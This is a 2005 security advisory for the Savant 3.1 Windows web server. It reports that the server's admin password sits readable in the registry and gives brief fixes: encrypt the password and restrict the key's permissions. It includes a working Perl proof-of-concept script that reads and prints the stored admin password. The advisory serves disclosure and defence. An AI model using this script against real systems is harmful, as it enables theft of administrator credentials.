Update:
12:12 31/08/2005
Subject:
" Savant Server Discloses Passwords"
Affected version:
Savant 3.1
Operating System:
- WINDOWS 95
- WINDOWS 98
- WINDOWS NT
- WINDOWS XP
Typical software:
- freeware
Vendor URL:
Mail -
WWW - http://savant.sourceforge.net
Description:
Savant is a full-featured open source / freeware web server designed to be run under any 32-bit version of
Microsoft Windows (including Windows 95, 98, ME, XP, NT, and 2000). Savant was designed to be easy to use, fast,
and secure.
Vulnerability:
A stored for administration password are captured at the Registry Editor,this could local user to see/retrive
the password as they have privillage to open registry editor.
Exploit:
#!usr/bin/perl
#
# Savant Server Password Disclosure
# ----------------------------------
# Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: http://savant.sourceforge.net
#
use Win32::Registry;
my $admin;
$::HKEY_LOCAL_MACHINE->Open("SOFTWARE\\DAEMONS\\Savant\\Users\\admin", $admin)
or die "Can't open password: $^E";
my ($type, $value);
$admin->QueryValueEx("Password", $type, $value) or die "No password: $^E";
print "Savant Server Password Disclosure\n";
print "---------------------------------\n\n";
print "Registry: HLKM\\SOFTWARE\\DAEMONS\\Savant\\Users\\admin\n";
print "Password: $value\n";
Solution:
On the registry Editor changes the registry path then try to encrypt
the password,it more safety.
Also set them whit permission(Advanced Security Setting),can be found
by rigth click the 'key'value then choose 'permission'.
Published by:
basher13 (Infam0us Gr0up - Securiti Research)
basher13@linuxmail.org / infamous.2hell.com